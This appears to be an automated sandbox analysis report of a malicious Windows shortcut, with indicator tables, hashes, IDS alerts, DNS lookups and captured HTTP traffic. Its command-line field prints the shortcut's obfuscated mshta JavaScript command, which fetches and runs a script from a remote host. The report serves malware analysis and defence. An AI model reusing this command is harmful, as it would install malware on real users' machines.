                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:7
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:V323904LY3.lNK.lnk
                                                Detection:MAL
                                                Classification:mal64.winLNK@1/1@2/2
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 1
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .lnk
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 5744 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.96.3 | NF_Payment_Ref_FAN930276.exe | malicious | FormBook | www.timizoasisey.shop/3p0l/
188.114.96.3 | FW CMA SHZ Freight invoice CHN1080769.exe | malicious | FormBook | www.bayarcepat19.click/5hcm/
188.114.96.3 | greenthingswithgreatnewsforgetmeback.hta | malicious | Cobalt Strike, HTMLPhisher | paste.ee/d/sTNna
188.114.96.3 | Lana_Rhoades_Photoos.js | malicious | Unknown | paste.ee/d/ciuNW
188.114.96.3 | PO-000172483 (2).exe | malicious | FormBook, GuLoader | www.launchdreamidea.xyz/2b9b/
188.114.96.3 | VfKk5EmvwW.exe | malicious | DCRat, PureLog Stealer, zgRAT | 083098cm.n9shteam.in/vmBase.php
188.114.96.3 | Payment Slip_SJJ023639#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/CEqTVkxM/download
188.114.96.3 | 0JLWNg4Sz1.exe | malicious | DCRat, PureLog Stealer, zgRAT | 977255cm.nyashkoon.in/secureWindows.php
188.114.96.3 | zxalphamn.doc | malicious | Lokibot | touxzw.ir/alpha2/five/fre.php
188.114.96.3 | QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/jI82Ms6K/download
                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://send-space.s3.eu-north-1.amazonaws.com/de.html | malicious | Unknown | 104.22.75.171
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
CLOUDFLARENETUS | ICBM.exe | malicious | Xmrig | 104.26.9.242
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe | malicious | Xmrig | 162.159.135.233
CLOUDFLARENETUS | ICBM.exe | malicious | Xmrig | 104.26.9.242
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
CLOUDFLARENETUS | 2Lzx7LMDWV.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | PO-000172483.exe | malicious | FormBook, GuLoader | 142.250.138.94, 188.114.96.3
37f463bf4616ecd445d4a1937da06e19 | PO-000172483.exe | malicious | FormBook, GuLoader | 142.250.138.94, 188.114.96.3
37f463bf4616ecd445d4a1937da06e19 | oZ7nac01Em.exe | malicious | Stealc, Vidar | 142.250.138.94, 188.114.96.3
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.FileRepMalware.6479.21607.exe | malicious | Unknown | 142.250.138.94, 188.114.96.3
37f463bf4616ecd445d4a1937da06e19 | WGo3ga1AL9.exe | malicious | Stealc, Vidar | 142.250.138.94, 188.114.96.3
37f463bf4616ecd445d4a1937da06e19 | FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exe | malicious | FormBook, GuLoader | 142.250.138.94, 188.114.96.3
37f463bf4616ecd445d4a1937da06e19 | FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exe | malicious | FormBook, GuLoader | 142.250.138.94, 188.114.96.3
37f463bf4616ecd445d4a1937da06e19 | PO-000172483 (2).exe | malicious | FormBook, GuLoader | 142.250.138.94, 188.114.96.3
37f463bf4616ecd445d4a1937da06e19 | Quotation.exe | malicious | FormBook, GuLoader | 142.250.138.94, 188.114.96.3
37f463bf4616ecd445d4a1937da06e19 | Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs | malicious | GuLoader, Snake Keylogger | 142.250.138.94, 188.114.96.3
                                                No context
                                                Process:C:\Windows\System32\mshta.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3822)
                                                Category:dropped
                                                Size (bytes):21616
                                                Entropy (8bit):5.759193275884719
                                                Encrypted:false
                                                SSDEEP:384:ucT4FSspa1ocyXNA4lbGaXUzhhbRCKeFyY2b7nBY0CO/nKi1xCejiw:u7E1ocydvEaChbYKeknBY0CO/JxPiw
                                                MD5:03EA95BE9108347432B61E619F13435F
                                                SHA1:5272A310AAE922F0EDFB8E4564CB695B386F63A1
                                                SHA-256:27EA46A4390F2C74BC5F811971332BD0CAA34F5E4EFF79A67FCD80B19B15D21C
                                                SHA-512:C2AE74DE88D75639BD48454C962FD48A28F05CAB87044E38D9A78228778D124E6D7DB690C1156F6F1FDC3711A2C5566A4098D69F2E144B8D5D56B5A21FE80B8F
                                                Malicious:false
                                                Reputation:low
                                                Preview:<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="IE=edge" http-equiv="X-UA-Compatible"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="RXNHAXUkhkvUFFm7j6blOQ">(function(){var _g={kEI:'A4MkZ9HzDOaLwbkP5ue5gAI',kEXPI:'0,3700340,609,435,541533,2891,8348,71100,27868,162437,23024,6700,126319,8155,23350,6431,2,16003,5608,4171,62657,36747,3801,2412,33249,15816,1804,7734,18098,9436,11814,1634,13494,15783,27083,5203198,10498,396,134,5991956,2840026,1088,240,17,67,1,79,32,14,30,2,32,1,7,13,8,25,1,6,1,6,
                                                File type:MS Windows shortcut, Item id list present, Has command line arguments, Archive, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                Entropy (8bit):7.415977714569129
                                                TrID:
                                                • Windows Shortcut (20020/1) 100.00%
                                                File name:V323904LY3.lNK.lnk
                                                File size:1'544 bytes
                                                MD5:2e4c1c46c2c57baf20ef148ec89e47a2
                                                SHA1:2823f47f3da40c531b538c8edc037c93325dabc5
                                                SHA256:8c787fa0ec9be5bf076e6c25682a7926aa188a5b9378066008785f165765bc34
                                                SHA512:9d37c734f35db08e81c2d4ea627eab169a4cde0b9d18f5b8833d2e339d86978412598df4c2e95fbe5b1c29bcd30df99dc24ca985c0eeb90aee11330b76479bbe
                                                SSDEEP:24:8rBJlA3aMz9FkHqt0VGCZaDzCHbK8E/LWPItbrUUkVCc04xlpRS6jityJfXWK/DQ:8VJa3fz9W3Z6m77E/LTxTcZvuYJfmGDQ
                                                TLSH:A531E9B47AE0B417F2AE6BF21D0227D6E73116922EDE68C74DD02C98142810EDE84FD8
                                                File Content Preview:L..................F!... ...................................................]....P.O. .:i.....+00.../C:\......................+.2...........Windows\System32\conhOst.exe...[. C:\Windows\System32\MShTa "jAvasCRipT:try{try{var _10xlBOKJ=['\x44\x55\x44\x52\67
                                                Icon Hash:85c6c7ce8f896105

                                                General

                                                Relative Path:
                                                Command Line Argument: C:\Windows\System32\MShTa "jAvasCRipT:try{try{var _10xlBOKJ=['\x44\x55\x44\x52\67\116\x39','\x73\143\162\151\x70\164\x3a\x68\x54\x74\x70\x53\x3a\x2f\x2f\160\x6c\x65\156\x69\154\x33\x32\64\x2e\x72\x65\x6e\155\x61\x72\153\56\x6f\x72\147\x2f\77\65\57'];GetObject(_10xlBOKJ[1])[_10xlBOKJ[0]]();}catch(e){}}catch(e){}close()" >nul 2>&1 >nul 2>&1&&exit
                                                Icon location:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-01T08:28:01.896363+0100 | 2851288 | ETPRO MALWARE Astaroth Stealer Activity (GET) | 1 | 192.168.2.4 | 49730 | 188.114.96.3 | 443 | TCP
2024-11-01T08:28:19.648837+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.4 | 62820 | TCP
2024-11-01T08:28:58.464126+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.4 | 62826 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 1, 2024 08:28:00.852899075 CET | 58618 | 53 | 192.168.2.4 | 1.1.1.1
Nov 1, 2024 08:28:00.878838062 CET | 53 | 58618 | 1.1.1.1 | 192.168.2.4
Nov 1, 2024 08:28:01.899667978 CET | 63435 | 53 | 192.168.2.4 | 1.1.1.1
Nov 1, 2024 08:28:01.906687975 CET | 53 | 63435 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 1, 2024 08:28:00.852899075 CET | 192.168.2.4 | 1.1.1.1 | 0xf53a | Standard query (0) | plenil324.renmark.org | A (IP address) | IN (0x0001) | false
Nov 1, 2024 08:28:01.899667978 CET | 192.168.2.4 | 1.1.1.1 | 0x4557 | Standard query (0) | www.google.com.br | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 1, 2024 08:28:00.878838062 CET | 1.1.1.1 | 192.168.2.4 | 0xf53a | No error (0) | plenil324.renmark.org |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 08:28:00.878838062 CET | 1.1.1.1 | 192.168.2.4 | 0xf53a | No error (0) | plenil324.renmark.org |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                • plenil324.renmark.org
                                                • www.google.com.br
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 188.114.96.3 | 443 | 5744 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-01 07:28:01 UTC | 304 | OUT | GET /?5/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: plenil324.renmark.org
    Connection: Keep-Alive
2024-11-01 07:28:01 UTC | 1010 | IN | HTTP/1.1 302 Found
    Date: Fri, 01 Nov 2024 07:28:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=08qn5v45t37ij9q7197vaf3gq4; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Access-Control-Allow-Origin: *
    Location: https://www.google.com.br
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=91Kdv4SCYBTaa7K3XOH9SZzUMTQNnVipg%2FCg6DxQPhF%2FrxVoQskQcONy0WhT3Eq0uONflstTCbcKxqAFEtLwcUy%2Fs0OzANHyOqdeLsuHWCIthF0Hn3Oyd3uYrdEZLkdKVUpIGjg5EkA%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8dba2a6aab664612-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1997&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=886&delivery_rate=1486652&cwnd=238&unsent_bytes=0&cid=8bdc0c606b970e76&ts=363&x=0"
2024-11-01 07:28:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 62814 | 142.250.138.94 | 443 | 5744 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-01 07:28:03 UTC | 297 | OUT | GET / HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Connection: Keep-Alive
    Host: www.google.com.br
2024-11-01 07:28:03 UTC | 1185 | IN | HTTP/1.1 200 OK
    Date: Fri, 01 Nov 2024 07:28:03 GMT
    Expires: -1
    Cache-Control: private, max-age=0
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-RXNHAXUkhkvUFFm7j6blOQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Accept-CH: Sec-CH-Prefers-Color-Scheme
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Server: gws
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AVYB7cpkINnLfw942XggvVEzFjh8xz-KfkZ2sMo67_OCiq3tkTjyPJG3Sg; expires=Wed, 30-Apr-2025 07:28:03 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax
    Set-Cookie: NID=518=vEyeC9NARuOXoJiVW6RM1sycdBdS15KGCHC-QnRF5ICTtAqUry7Ja7nidRTFfqbpgpN1gY4UvcJong00rP3awSkTYXXu3tymNFGfhI-5GmBq2HpS6gRrwcxU2KcIn2-Uu7rEiUk98g_V4eOpSbJgHUGrdbpS0uX2IAYAtVr3d1RWUs6GnosV0HO_pw32lnN8RekV; expires=Sat, 03-May-2025 07:28:03 GMT; path=/; domain=.google.com.br; HttpOnly
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Accept-Ranges: none
    Vary: Accept-Encoding
    Connection: close
    Transfer-Encoding: chunked
2024-11-01 07:28:03 UTC | 193 | IN | Data Raw: 33 35 64 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68
    Data Ascii: 35d5<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="IE=edge" http-equiv="X-UA-Compatible"><meta http-equiv="Content-Type" content="text/h
2024-11-01 07:28:03 UTC | 1378 | IN | Data Raw: 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d
    Data Ascii: tml; charset=UTF-8"><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><m
2024-11-01 07:28:03 UTC | 1378 | IN | Data Raw: 39 2c 31 30 34 38 2c 34 31 33 38 2c 32 34 35 37 2c 37 32 38 2c 34 2c 32 39 33 33 2c 32 31 39 2c 34 37 33 2c 32 2c 33 38 31 2c 35 30 31 2c 32 2c 39 32 37 2c 34 39 38 2c 31 33 30 37 2c 32 31 38 38 2c 37 32 38 2c 33 38 36 2c 37 39 34 2c 32 31 35 2c 31 30 32 36 2c 31 39 32 2c 38 39 36 2c 32 2c 37 2c 31 34 39 2c 36 35 30 2c 32 34 32 38 2c 37 35 35 2c 31 37 35 35 2c 31 33 36 37 2c 31 2c 36 2c 31 37 39 2c 33 30 31 2c 31 30 39 2c 31 36 35 2c 34 35 36 2c 31 31 32 2c 31 32 35 2c 32 2c 31 35 34 2c 32 30 38 2c 31 39 31 2c 31 32 39 2c 32 36 35 2c 39 33 36 2c 39 33 36 2c 34 35 34 2c 31 2c 31 31 34 37 2c 32 35 33 2c 37 34 2c 31 2c 32 34 39 2c 31 34 35 35 2c 37 32 2c 32 33 30 2c 33 32 31 2c 34 2c 32 2c 35 38 38 2c 31 33 36 2c 39 33 2c 32 2c 32 2c 31 32 35 31 2c 32 2c 32
    Data Ascii: 9,1048,4138,2457,728,4,2933,219,473,2,381,501,2,927,498,1307,2188,728,386,794,215,1026,192,896,2,7,149,650,2428,755,1755,1367,1,6,179,301,109,165,456,112,125,2,154,208,191,129,265,936,936,454,1,1147,253,74,1,249,1455,72,230,321,4,2,588,136,93,2,2,1251,2,2
2024-11-01 07:28:03 UTC | 1378 | IN | Data Raw: 22 26 65 69 3d 22 2b 70 28 64 29 2c 62 2e 73 65 61 72 63 68 28 22 26 6c 65 69 3d 22 29 3d 3d 3d 2d 31 26 26 28 64 3d 71 28 64 29 29 26 26 28 65 2b 3d 22 26 6c 65 69 3d 22 2b 64 29 29 3b 64 3d 22 22 3b 76 61 72 20 67 3d 62 2e 73 65 61 72 63 68 28 22 26 63 73 68 69 64 3d 22 29 3d 3d 3d 2d 31 26 26 61 21 3d 3d 22 73 6c 68 22 2c 66 3d 5b 5d 3b 66 2e 70 75 73 68 28 5b 22 7a 78 22 2c 44 61 74 65 2e 6e 6f 77 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 5d 29 3b 68 2e 5f 63 73 68 69 64 26 26 67 26 26 66 2e 70 75 73 68 28 5b 22 63 73 68 69 64 22 2c 68 2e 5f 63 73 68 69 64 5d 29 3b 63 3d 63 28 29 3b 63 21 3d 6e 75 6c 6c 26 26 66 2e 70 75 73 68 28 5b 22 6f 70 69 22 2c 63 2e 74 6f 53 74 72 69 6e 67 28 29 5d 29 3b 66 6f 72 28 63 3d 30 3b 63 3c 66 2e 6c 65 6e 67 74 68 3b 63
    Data Ascii: "&ei="+p(d),b.search("&lei=")===-1&&(d=q(d))&&(e+="&lei="+d));d="";var g=b.search("&cshid=")===-1&&a!=="slh",f=[];f.push(["zx",Date.now().toString()]);h._cshid&&g&&f.push(["cshid",h._cshid]);c=c();c!=null&&f.push(["opi",c.toString()]);for(c=0;c<f.length;c
2024-11-01 07:28:03 UTC | 1378 | IN | Data Raw: 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 69 66 28 61 3d 62 2e 74 61 72 67 65 74 29 7b 76 61 72 20 63 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 75 62 6d 69 74 66 61 6c 73 65 22 29 3b 61 3d 63 3d 3d 3d 22 31 22 7c 7c 63 3d 3d 3d 22 71 22 26 26 21 61 2e 65 6c 65 6d 65 6e 74 73 2e 71 2e 76 61 6c 75 65 3f 21 30 3a 21 31 7d 65 6c 73 65 20 61 3d 21 31 3b 61 26 26 28 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 7d 2c 21 30 29 3b 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63
    Data Ascii: nt.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a=c==="1"||c==="q"&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("clic
2024-11-01 07:28:03 UTC | 1378 | IN | Data Raw: 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 61 7b 63 6f 6c 6f 72 3a 23 36 38 31 64 61 38 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 3a 68 6f 76 65 72 2c 61 3a 61 63 74 69 76 65 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 66 6c 20 61 7b 63 6f 6c 6f 72 3a 23 31 39 36 37 64 32 7d 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 36 38 31 64 61 38 7d 2e 73 62 6c 63 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 70 78 7d 2e 73 62 6c 63 20 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 70 78 20 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 6c 73 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66
    Data Ascii: ground:#fff;color:#000}a{color:#681da8;text-decoration:none}a:hover,a:active{text-decoration:underline}.fl a{color:#1967d2}a:visited{color:#681da8}.sblc{padding-top:5px}.sblc a{display:block;margin:2px 0;margin-left:13px;font-size:11px}.lsbb{background:#f
2024-11-01 07:28:03 UTC | 1378 | IN | Data Raw: 65 78 70 69 64 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 6b 45 58 50 49 29 29 3b 63 2b 3d 22 26 73 72 63 70 67 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 73 6e 29 2b 22 26 6a 73 72 3d 22 2b 62 28 74 2e 6a 73 72 29 2b 0a 22 26 62 76 65 72 3d 22 2b 62 28 74 2e 62 76 29 3b 74 2e 64 70 66 26 26 28 63 2b 3d 22 26 64 70 66 3d 22 2b 62 28 74 2e 64 70 66 29 29 3b 76 61 72 20 66 3d 61 2e 6c 69 6e 65 4e 75 6d 62 65 72 3b 66 21 3d 3d 76 6f 69 64 20 30 26 26 28 63 2b 3d 22 26 6c 69 6e 65 3d 22 2b 66 29 3b 76 61 72 20 68 3d 61 2e 66 69 6c 65 4e 61 6d 65 3b 68 26 26 28 68 2e 69 6e 64 65 78 4f 66 28 22 2d 65 78 74 65 6e 73 69 6f 6e 3a 2f 22 29 3e 30 26 26 28 65 3d 33 29 2c 63 2b 3d 22 26 73 63 72 69 70 74 3d 22 2b 62 28 68 29 2c 66 26 26 68 3d 3d 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61
    Data Ascii: expid="+b(google.kEXPI));c+="&srcpg="+b(google.sn)+"&jsr="+b(t.jsr)+"&bver="+b(t.bv);t.dpf&&(c+="&dpf="+b(t.dpf));var f=a.lineNumber;f!==void 0&&(c+="&line="+f);var h=a.fileName;h&&(h.indexOf("-extension:/")>0&&(e=3),c+="&script="+b(h),f&&h===window.loca
2024-11-01 07:28:03 UTC | 1378 | IN | Data Raw: 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2e 62 72 2f 69 6d 67 68 70 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 69 22 3e 49 6d 61 67 65 73 3c 2f 61 3e 20 3c 61 20 63 6c 61 73 73 3d 67 62 31 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 6d 61 70 73 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 6c 22 3e 4d 61 70 73 3c 2f 61 3e 20 3c 61 20 63 6c 61 73 73 3d 67 62 31 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 38 22 3e 50 6c 61 79 3c 2f 61 3e 20 3c 61 20 63 6c 61 73 73 3d 67 62 31 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 3f 74 61 62 3d 77 31 22 3e 59 6f 75 54 75 62 65 3c 2f 61 3e
    Data Ascii: ps://www.google.com.br/imghp?hl=en&tab=wi">Images</a> <a class=gb1 href="https://maps.google.com/maps?hl=en&tab=wl">Maps</a> <a class=gb1 href="https://play.google.com/?hl=en&tab=w8">Play</a> <a class=gb1 href="https://www.youtube.com/?tab=w1">YouTube</a>
2024-11-01 07:28:03 UTC | 1378 | IN | Data Raw: 22 3e 3c 74 72 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 3e 3c 74 64 20 77 69 64 74 68 3d 22 32 35 25 22 3e 26 6e 62 73 70 3b 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 6e 6f 77 72 61 70 3d 22 22 3e 3c 69 6e 70 75 74 20 76 61 6c 75 65 3d 22 65 6e 22 20 6e 61 6d 65 3d 22 68 6c 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 73 6f 75 72 63 65 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 68 70 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 62 69 77 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 62 69 68 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 73 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68
    Data Ascii: "><tr valign="top"><td width="25%">&nbsp;</td><td align="center" nowrap=""><input value="en" name="hl" type="hidden"><input name="source" type="hidden" value="hp"><input name="biw" type="hidden"><input name="bih" type="hidden"><div class="ds" style="heigh
